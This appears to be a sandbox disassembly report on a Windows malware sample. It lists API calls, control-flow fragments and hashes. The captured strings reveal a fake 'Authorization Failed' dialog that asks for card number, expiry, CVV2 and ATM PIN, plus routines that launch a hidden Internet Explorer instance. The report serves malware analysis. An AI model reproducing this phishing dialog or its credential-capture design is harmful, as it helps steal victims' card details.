                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

